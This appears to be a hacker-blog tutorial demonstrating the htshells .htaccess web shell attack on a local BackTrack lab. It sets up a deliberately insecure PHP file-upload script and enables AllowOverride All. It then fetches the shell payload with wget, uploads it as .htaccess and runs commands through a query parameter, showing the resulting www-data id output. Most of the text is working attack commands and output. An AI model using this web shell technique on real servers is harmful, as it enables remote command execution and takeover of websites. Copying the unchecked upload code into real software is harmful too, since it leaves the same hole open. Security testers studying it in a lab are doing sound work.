htshells tutorial
Here is a quick tutorial on how to use the .htaccess shell attack. I did this on a backtrack 5 vm, the upload example is loosely based on (http://www.w3schools.com/PHP/php_file_upload.asp). The first thing we do is create our vulnerable "application", like this:
Next we have to change the apache configuration, as backtrack comes with secure defaults.
Change the AllowOverride argument to all under the /var/www directory configuration
Then start apache
Next we grab and prepare our payload:
01 | root@bt:/var/www# mkdir htshells |
02 | root@bt:/var/www# cd htshells/ |
03 | root@bt:/var/www/htshells# chmod 777 . |
04 | root@bt:/var/www/htshells# cat > index.html |
05 | <html> |
06 | <body> |
07 |
08 | <form action="upload_file.php" method="post" |
09 | enctype="multipart/form-data"> |
10 | <label for="file">Filename:</label> |
11 | <input type="file" name="file" id="file" /> |
12 | <br /> |
13 | <input type="submit" name="submit" value="Submit" /> |
14 | </form> |
15 |
16 | </body> |
17 | </html> |
18 | root@bt:/var/www/htshells# cat > upload_file.php |
19 | <?php |
20 | if ($_FILES['file']['error'] > 0) |
21 | { |
22 | echo "Error: ".$_FILES['file']['error']."<br />"; |
23 | } |
24 | else |
25 | { |
26 | echo "Upload: ".$_FILES['file']['name']."<br />"; |
27 | echo "Type: ".$_FILES['file']['type']."<br />"; |
28 | echo "Size: " . ($_FILES['file']['size'] / 1024) . " Kb<br />"; |
29 | echo "Stored in: ".$_FILES['file']['tmp_name']."<br />"; |
30 | } |
31 | if (file_exists($_FILES['file']['name'])) |
32 | { |
33 | echo $_FILES['file']['name']." already exists."; |
34 | } |
35 | else |
36 | { |
37 | move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']); |
38 | echo "Moved to: ".$_FILES['file']['name']; |
39 | } |
40 | ?> |
1 | root@bt:/var/www# vim /etc/apache2/sites-enabled/000-default |
1 | <Directory /var/www/> |
2 | Options Indexes FollowSymLinks MultiViews |
3 | AllowOverride All |
4 | Order allow,deny |
5 | allow from all |
6 | </Directory> |
1 | root@bt:/var/www/htshells# apache2ctl start |
01 | root@bt:/var/www/htshells# cd /root |
02 | root@bt:~# wget https://github.com/wireghoul/htshells/raw/master/htaccess.php |
03 | --2011-06-01 20:16:16-- https://github.com/wireghoul/htshells/raw/master/htaccess.php |
04 | Resolving github.com... 207.97.227.239 |
05 | Connecting to github.com|207.97.227.239|:443... connected. |
06 | HTTP request sent, awaiting response... 200 OK |
07 | Length: 536 [text/plain] |
08 | Saving to: `htaccess.php' |
09 |
10 | 100%[========================================================================================>] 536 --.-K/s in 0s |
11 |
12 | 2011-06-01 20:16:18 (53.1 MB/s) - `htaccess.php' saved [536/536] |
13 |
14 | root@bt:~# mv htaccess.php .htaccess |
15 | root@bt:~# |
Next we visit our demo application in the browser
Select the file to upload (you might have to right click and select show hidden files)
Submit the file for upload
01 | root@bt:/var/www/htshells# GET http://localhost/htshells/.htaccess?c=id |
02 | # Self contained .htaccess web shell - Part of the htshell project |
03 | # Written by Wireghoul - http://www.justanotherhacker.com |
04 |
05 | # Override default deny rule to make .htaccess file accessible over web |
06 | <Files ~ "^\.ht"> |
07 | Order allow,deny |
08 | Allow from all |
09 | </Files> |
10 |
11 | # Make .htaccess file be interpreted as php file. This occur after apache has interpreted |
12 | # the apache directoves from the .htaccess file |
13 | AddType application/x-httpd-php .htaccess |
14 |
15 | ###### SHELL ###### |
16 | uid=33(www-data) gid=33(www-data) groups=33(www-data) |
17 | ###### LLEHS ###### |
